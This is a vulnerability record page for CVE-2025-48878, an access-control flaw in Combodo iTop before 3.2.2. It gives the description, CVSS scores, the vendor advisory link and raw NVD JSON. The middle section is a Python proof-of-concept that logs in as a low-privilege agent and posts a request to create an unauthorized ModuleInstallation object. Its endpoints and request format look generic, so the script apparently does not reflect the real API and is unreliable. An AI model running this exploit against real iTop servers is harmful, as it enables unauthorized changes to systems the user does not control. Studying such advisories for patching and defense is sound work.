Security Vulnerability Report
CVE-2025-48878 CVSS 4.3 MEDIUM

CVE-2025-48878

Published: 2025-11-10 21:15:39
Last Modified: 2025-11-21 13:38:44

Description

Combodo iTop is a web based IT service management tool. In versions on the 3.x branch prior to 3.2.2, an insecure direct object reference allows a user (e.g. with Service desk agent profile) to create a ModuleInstallation object when they shouldn't be able to do so. Version 3.2.2 fixes the issue.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
Combodo iTop 3.x < 3.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-48878 PoC - Combodo iTop IDOR Vulnerability
# Target: Combodo iTop < 3.2.2
# Vulnerability: Insecure Direct Object Reference in ModuleInstallation creation

TARGET_URL = "http://target-itop-server/"
LOGIN_URL = TARGET_URL + "pages/ajax.render.php"
API_URL = TARGET_URL + "api.php"


def login_as_service_agent(session, username, password):
    """Authenticate as a Service Desk Agent with limited privileges"""
    login_data = {
        "operation": "login",
        "username": username,
        "password": password
    }
    response = session.post(LOGIN_URL, data=login_data)
    return "auth_token" in response.text


def exploit_idor(session):
    """Exploit the IDOR vulnerability to create ModuleInstallation object"""
    # Construct the malicious request to create ModuleInstallation object
    # This should normally require admin privileges, but IDOR allows
    # low-privilege users (Service Desk Agent) to create it
    exploit_data = {
        "operation": "core/create",
        "class": "ModuleInstallation",
        "fields": {
            "name": "MaliciousModule",
            "label": "Unauthorized Module",
            "version": "1.0.0",
            "description": "Module created via IDOR exploit"
        },
        "comment": "CVE-2025-48878 PoC"
    }
    headers = {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }
    response = session.post(API_URL, json=exploit_data, headers=headers)
    return response.json()


def main():
    session = requests.Session()

    # Step 1: Login as low-privilege user (Service Desk Agent)
    if login_as_service_agent(session, "agent_user", "password"):
        print("[+] Successfully authenticated as Service Desk Agent")
    else:
        print("[-] Authentication failed")
        return

    # Step 2: Exploit IDOR vulnerability
    result = exploit_idor(session)
    if result.get("code", 0) == 0 or "objects" in result:
        print("[+] IDOR Exploit Successful!")
        print(f"[+] ModuleInstallation object created: {json.dumps(result, indent=2)}")
    else:
        print("[-] Exploit failed or already patched")
        print(f"[-] Response: {json.dumps(result, indent=2)}")


if __name__ == "__main__":
    main()
```

References

https://github.com/Combodo/iTop/security/advisories/GHSA-rj75-7cgw-4556 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-48878",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-10T21:15:39.263",
    "lastModified": "2025-11-21T13:38:44.000",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Combodo iTop is a web based IT service management tool. In versions on the 3.x branch prior to 3.2.2, an insecure direct object reference allows a user (e.g. with Service desk agent profile) to create a ModuleInstallation object when they shouldn't be able to do so. Version 3.2.2 fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.0.0",
                "versionEndExcluding": "3.2.2",
                "matchCriteriaId": "EAF7CD83-4986-43B2-9A2B-3E282671B00F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Combodo/iTop/security/advisories/GHSA-rj75-7cgw-4556",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```